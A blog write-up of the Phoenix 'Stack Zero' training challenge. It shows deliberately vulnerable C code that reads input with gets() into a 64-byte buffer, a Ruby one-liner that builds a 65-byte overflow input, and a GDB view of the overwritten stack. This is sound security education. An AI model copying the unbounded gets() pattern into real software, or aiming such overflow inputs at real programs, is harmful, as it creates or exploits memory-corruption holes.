loading...

(Write-up) Phoenix :: Stack Zero

aibhstin profile image Aibhstin ・2 min read

The source code for the Stack Zero challenge is given as the following:

#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>

#define BANNER \
  "Welcome to " LEVELNAME ", brought to you by https://exploit.education"

char *gets(char *);

int main(int argc, char **argv) {
  struct {
    char buffer[64];
    volatile int changeme;
  } locals;

  printf("%s\n", BANNER);

  locals.changeme = 0;
  gets(locals.buffer);

  if (locals.changeme != 0) {
    puts("Well done, the 'changeme' variable has been changed!");
  } else {
    puts(
        "Uh oh, 'changeme' has not yet been changed. Would you like to try "
        "again?");
  }

  exit(0);
}

Looking at the source code, we can see that a struct is created, and a buffer is declared just previously to a volatile int. The function gets is used, which is notorious for not performing any bounds checking on the input it receives.

user@phoenix-amd64:/opt/phoenix/amd64$ rabin2 -I stack-zero 
havecode true
pic      false
canary   false
nx       false
crypto   false
va       true
intrp    /opt/phoenix/x86_64-linux-musl/lib/ld-musl-x86_64.so.1
bintype  elf
class    ELF64
lang     c
arch     x86
bits     64
machine  AMD x86-64 architecture
os       linux
minopsz  1
maxopsz  16
pcalign  0
subsys   linux
endian   little
stripped false
static   false
linenum  true
lsyms    true
relocs   true
rpath    /opt/phoenix/x86_64-linux-musl/lib
binsz    4351

Even though it's fairly obvious where the vulnerability is in the binary, let's run it:

user@phoenix-amd64:/opt/phoenix/amd64$ ./stack-zero 
Welcome to phoenix/stack-zero, brought to you by https://exploit.education
Hello
Uh oh, 'changeme' has not yet been changed. Would you like to try again?

I'm going to use Ruby to create a file we can pipe into the program to try and make use of the exploit.

user@phoenix-amd64:/opt/phoenix/amd64$ ruby -e 'puts "A" * 65' > /tmp/stack-zero-out
user@phoenix-amd64:/opt/phoenix/amd64$ cat /tmp/stack-zero-out 
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA

And the exploit in action:

user@phoenix-amd64:/opt/phoenix/amd64$ cat /tmp/stack-zero-out | ./stack-zero 
Welcome to phoenix/stack-zero, brought to you by https://exploit.education
Well done, the 'changeme' variable has been changed!

In GDB, we can look at the state of the stack just after the call to gets:

(gdb) x/20xw $rsp
0x7fffffffe5e0: 0xffffe698      0x00007fff      0x00000000      0x00000001
0x7fffffffe5f0: 0x41414141      0x41414141      0x41414141      0x41414141
0x7fffffffe600: 0x41414141      0x41414141      0x41414141      0x41414141
0x7fffffffe610: 0x41414141      0x41414141      0x41414141      0x41414141
0x7fffffffe620: 0x41414141      0x41414141      0x41414141      0x41414141

Posted on Jun 17 by:

aibhstin profile

Aibhstin

@aibhstin

I'm an Ethical Hacking & Cybersecurity student and a Haskell programmer.

Discussion

markdown guide